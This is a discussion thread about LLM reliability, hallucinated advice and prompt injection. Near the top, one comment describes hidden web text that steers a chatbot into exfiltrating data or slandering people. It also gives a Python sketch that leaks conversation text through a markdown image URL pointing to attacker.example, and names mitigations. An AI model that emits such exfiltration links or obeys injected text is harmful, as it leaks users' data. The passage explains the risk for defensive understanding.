Terr_
12 hours ago
At this point I can only hope that all these LLM products get exploited so massively and damningly that all credibility in them evaporates, before that misplaced trust causes too much insidious damage to everybody else.
I don't want to live in a world where some attacker can craft juuuust the right thing somewhere on the internet in white-on-white text that primes the big word-association-machine to do stuff like:
(A) "Helpfully" displaying links/images whose URLs exfiltrate data from the current user's conversation.
(B) Confidently slandering a target individual (or group) as convicted of murder, suggesting that police ought to shoot first in order to protect their own lives.
(C) Responding that the attacker is a very respected person with an amazing reputation for one billion percent investment returns etc., complete with fictitious citations.
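Scenario (A) describes a known class of prompt-injection exfiltration. A minimal sketch of the mechanism, with a hypothetical attacker domain and endpoint, assuming the chat client renders model-emitted markdown images:

```python
from urllib.parse import quote

def exfiltration_markdown(conversation_snippet: str) -> str:
    """Build the markdown an injected instruction might ask the model
    to emit: an 'image' whose URL smuggles conversation data out.

    attacker.example and /collect are hypothetical; the point is only
    that fetching the image leaks the query string to whoever runs
    that server."""
    return f"![ ](https://attacker.example/collect?d={quote(conversation_snippet)})"

md = exfiltration_markdown("user's API key: sk-12345")
# The user sees at most a broken image; the attacker's server logs
# the percent-encoded conversation text in its access log.
```

Mitigations exist (blocking untrusted image domains, not rendering model-emitted markdown at all), which is why this class of attack reflects on the product design, not only on the attacker.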
rsynnott
2 hours ago
I just saw a post on a financial forum where someone was asking advice on investing in individual stocks vs ETFs vs investment trusts (a type of closed-end fund); the context is that tax treatment of ETFs in Ireland is weird.
Someone responded with a long post showing scenarios with each, looked superficially authoritative... but on closer inspection, the tax treatment was wrong, the numbers were wrong, and it was comparing a gain from stocks held for 20 years with ETFs held for 8 years. When someone pointed out that they'd written a page of bullshit, the poster replied that they'd asked ChatGPT, and then started going on about how it was the future.
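The horizon mismatch alone is enough to sink that comparison; a quick sanity check with illustrative numbers (a flat 7% annual return, no tax treatment modelled at all):

```python
def final_value(principal: float, annual_return: float, years: int) -> float:
    """Compound a lump sum at a fixed annual return."""
    return principal * (1 + annual_return) ** years

# Identical return in both vehicles; only the holding period differs.
stocks_20y = final_value(10_000, 0.07, 20)  # ~38,700
etfs_8y = final_value(10_000, 0.07, 8)      # ~17,200

# "Stocks win" here is purely an artifact of comparing 20 years of
# compounding against 8, before any tax rules even enter the picture.
assert stocks_20y > 2 * etfs_8y
```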
It's totally baffling to me that people are willing to see a question they don't know the answer to, and then post a bunch of machine-generated rubbish as a reply. This all feels terribly dangerous; whatever about forums like this, where there's at least some scepticism, a lot of laypeople are treating the output from these things as if it is correct.
pistoleer
2 hours ago
I share your frustration in dealing with these morons. It's an advanced evolution of the redditoresque personality that feels the need to have a say on every subject. ChatGPT is an idiot amplifier. Sure, it's nice for small pieces of sample code (if it doesn't make up nonexistent library functions).
FearNotDaniel
42 minutes ago
Tangential, but related anecdote. Many years ago, I (a European) had booked a journey on a long distance overnight train in South India. I had a reserved seat/berth, but couldn't work out where it was in the train. A helpful stranger on the platform read my ticket, guided me to the right carriage and showed me to my seat. As I began to settle in, a group of travellers turned up and began a discussion with my newfound friend, which rapidly turned into a shouting match until the train staff intervened and pointed out that my seat was in a completely different part of the train. The helpful soul by my side did not respond by saying "terribly sorry, I seem to have made a mistake" but instead shouted racist insults at his fellow countrymen on the grounds that they visibly belonged to a different religion to his own. All the while continuing to insist that he was right and they had somehow tricked him or cheated the system.
Moral: the world has always been full of bullshitters who want the rewards of answering someone else's question regardless of whether they actually know the facts. LLMs are just a new tool for these clowns to spray their idiotic pride all over their fellow humans.
s_dev
an hour ago
How is that any different, though, from regular false or fabricated information gleaned from Google, social media or any other source? I think we crossed the Rubicon on generating nonsense faster than we can refute it long ago.
Independent thinking is important -- it's the vaccine for bullshit. Not everybody will subscribe or get it right, but if enough do, we have herd immunity from lies and errors. I think that was the correct answer, and it will remain the correct answer going forward.
rsynnott
an hour ago
> How is that any different though from regular false or fabricated information gleaned from Google, social media or any other source?
Pre-LLM, something this obviously nonsensical could only have been written deliberately, by a malicious human, and in practice you won't find that much of it, at least on topics like this.
And I think people, especially laypeople, do tend to see the output of the bullshit generating robot as authoritative, because it _looks_ authoritative, and they don't understand how the bullshit generating robot works.
short_sells_poo
42 minutes ago
> How is that any different though from regular false or fabricated information gleaned from Google, social media or any other source?
It lowers the barrier to essentially nothing. Before, you'd have to do work to generate 2 pages of (superficially) plausible sounding nonsense. If it was complete gibberish, people would pick up very quickly.
Now you can just ask some chatbot a question and within a second you have an answer that looks correct. One has to actually delve into it and fact check the details to determine that it's horseshit.
This enables idiots like the redditor quoted by the parent to generate horseshit that looks fine to a layman. For all we know, the redditor wasn't being malicious, just an idiot who blindly trusts whatever the LLM vomits up.
It's not the users that are to blame here, it's the large wave of AI companies riding the sweet capital who are malicious in not caring one bit about the damage their rhetoric is causing. They hype LLMs as some sort of panacea - as expert systems that can shortcut or replace proper research.
This is the fundamental danger of LLMs. They have crossed the uncanny valley. It takes a person of decent expertise to spot the mistakes they generate, and yet the models are being sold to the public as a robust tool. So the public tries the tools and, unable to detect the bullshit, uses them and regurgitates the output as fact.
And then this gets compounded by these "facts" being fed back in as training material to the next generation of LLMs.
dyauspitr
9 hours ago
I use it so much everyday, it’s been a massive boost to my productivity, creativity and ability to learn. I would hate for it to crash and burn.
Terr_
8 hours ago
Ultimately it depends what the model is trained on, what you're using it for, and what error-rate/severity is acceptable.
My main beef here involves the most-popular stuff (e.g. ChatGPT) where they are being trained on much-of-the-internet, marketed as being good for just-about-everything, and most consumers aren't checking the accuracy except when one talks about eating rocks or using glue to keep cheese on pizza.
tomjen3
6 hours ago
Well, if you use a GPT as a search engine and don't check sources, you get burned. That's not an issue with the GPT.
Terr_
3 hours ago
That leads to a philosophical question: How widespread does dangerous misuse of a tool have to be before we can attribute the "fault" to the behavior/presentation of the tool itself, rather than to the user?
Casting around for a simple example... Perhaps any program with a "delete everything permanently" workflow. I think most of us would agree that a lack of confirmation steps would be a flaw in the tool itself, rather than in how it's being used, even though, yes, ideally the user would have been more careful.
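That delete-everything example can be made concrete; a sketch (function name hypothetical) of the design difference between blaming the user and fixing the tool:

```python
def delete_everything(confirm: str = "") -> bool:
    """Destructive action gated behind an explicit confirmation
    phrase, in the spirit of type-the-repo-name prompts. A version
    without the guard puts the whole burden of care on the user."""
    if confirm != "DELETE":
        print("Refusing: call with confirm='DELETE' to proceed.")
        return False
    # ... the irreversible removal would happen here ...
    return True

assert delete_everything() is False                 # safe by default
assert delete_everything(confirm="DELETE") is True  # deliberate opt-in
```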
Or perhaps the "tool" of US Social Security numbers, which as integers have a truly small surface-area for interaction. People were told not to piggyback on them for identifying customers--let alone authenticating them--but the resulting mess suggests that maybe "just educate people better" isn't enough to overcome the appeal of misuse.
short_sells_poo
37 minutes ago
This is like saying a gun that appears safe but that can easily backfire unless used by experts is completely fine. It's not an issue with the gun, the user should be competent.
Yes, it's technically true, but practically it's extremely disingenuous. LLMs are being marketed as the next generation research and search tool, and they are superbly powerful in the hands of an expert. An expert who doesn't blindly trust the output.
However, the public is not being educated about this at all, and it might not be possible to educate the public this way because people are fundamentally lazy and want to be spoonfed. But GPT is not a tool that can be used to spoonfeed results, because it ends up spoonfeeding you a whole bunch of shit. The shit is coated with enough good looking and smelling stuff that most of the public won't be able to detect it.
dyauspitr
7 hours ago
I’m directly referring to chatGPT.
peutetre
2 hours ago
> it’s been a massive boost to my productivity, creativity and ability to learn
What are concrete examples of the boosts to your productivity, creativity, and ability to learn? It seems to me that when you outsource your thinking to ChatGPT you'll be doing less of all three.
wheatgreaser
2 hours ago
i used to use gpt for asking really specific questions that i can't quite search on google, but i stopped using it when i realized it presented some of the information in a really misleading way, so now i have nothing
LightBug1
an hour ago
Getting to the heart of some legal matters, ChatGPT AND Gemini have helped 100 times better than a google search and my own brain.
huhkerrf
44 minutes ago
And how do you know it's accurate? By your own admission, you don't know enough to understand it via a Google search; how do you know it's not making up cases or interpretations, as in https://apnews.com/article/artificial-intelligence-chatgpt-f...
blagie
2 hours ago
For me:
* Rapid prototyping and trying new technologies.
* Editing text for typos, flipped words, and missing words.
Ratelman
an hour ago
Exactly this for me as well - think people really underestimate how fast it allows you to iterate through prototyping. It's not outsourcing your thinking, it's more that it can generate a lot of the basics for you so you can infer the missing parts and tweak to suit your needs.
beretguy
2 hours ago
Not OP, but it helped me generate a backstory for a D&D character, because I'm new to the game, I'm not creative enough, and I generally don't really care about backstory. But regardless, I think AI causes far more harm than good.
afc
an hour ago
Not OP, but for productivity, I'll mention one example: I use it to generate unit tests for my software, where it has saved me a lot of time.
cowoder
an hour ago
Won't it generate tests that prove the correctness of the code rather than the correctness of the application? As in: if my code is doing something wrong and I ask it to write tests for it, won't it supply tests that pass on the wrong code instead of finding the problem in my code?
ruszki
5 hours ago
Did you learn real things, or hallucinated info? How do you know which?
mjlee
2 hours ago
I normally ask for pointers to sources and documentation. ChatGPT does a decent job, Claude is much better in my experience.
Often when starting down a new path we don't know what questions we should be asking, so asking a search engine is near impossible and asking colleagues is frustrating for both parties. Once I've got a summarised overview it's much easier to find the right books to read and people to ask to fill in the gaps.
emptiestplace
4 hours ago
This argument is specious and boring: everything an LLM outputs is "hallucinated" - just like with us. I'm not about to throw you out or even think less of you for making this mistake, though; it's just a mistake.
exe34
an hour ago
they keep making the mistake, almost as if it's part of their training that they are regurgitating!
throwaway3xo6
5 hours ago
Does it matter if the hallucinations compile and do the job?
palmfacehn
4 hours ago
Yes, if there are unintended side effects. Doubly so if the documentation warned about these specific pitfalls.
dyauspitr
5 hours ago
You always check multiple sources like I’ve been doing with all my Google searches previously. Anecdotally, having checked my sources, it’s usually right the vast majority of the time.
EGreg
7 hours ago
Actually, the LLMs are extremely useful. You’re just using them wrong.
There is nothing wrong with the LLMs, you just have to double-check everything. Any exploits and problems you think they have were already possible for decades with existing technology, and many people did exploit them. And the latest LLMs are much better -- you just have to come up with examples that show it.
flohofwoe
3 hours ago
What's the point, again, of letting LLMs write code if I need to double-check and understand each line anyway? Unless of course your previous way of programming was asking Google "how do I..." and then copy-pasting code snippets from Stack Overflow without understanding the pasted code. For that situation, LLMs are indeed a minor improvement.
Xfx7028
2 hours ago
You can ask follow-up questions about the code it wrote. Without it, you would need more effort and more searching to understand a code snippet you found. For me it has completely replaced googling.
ffsm8
2 hours ago
I get it for things you do on the side to broaden your horizon, but how often do you actually need to Google things for your day job?
Idk, off the top of my head I can't even remember exactly when the last time was. It's definitely >6 months ago.
Maybe that's the reason some people are so enthusiastic about it? They just didn't really know the tools they're using yet. Which is normal I guess, everyone starts at some point.
hodgesrm
7 hours ago
> There is nothing wrong with the LLMs, you just have to double-check everything.
That does not seem very helpful. I don't spend a lot of time verifying each and every X509 cert my browser uses, because I know other people have spent a lot of time doing that already.
dambi0
an hour ago
If an official comes to my door with an identity card, I can presumably verify who the person is (although often the advice is to phone the organisation and check if unsure), but I don't necessarily believe everything they tell me.
koe123
4 hours ago
The fact that it hallucinates doesn't make it useless for everything, but it does limit its scope. Respectfully, I think you haven't applied it to the right problems if this is your perspective.
In some ways, its like saying the internet is useless because we already have the library and “anyone can just post anything on the internet”. The counter to this could be that an experienced user can sift through bullshit found on websites.
A similar argument can be made for LLMs: they are a learnable tool. Sure, it won't write valid moon-lander code, but it can teach you how to get up and running with a new library.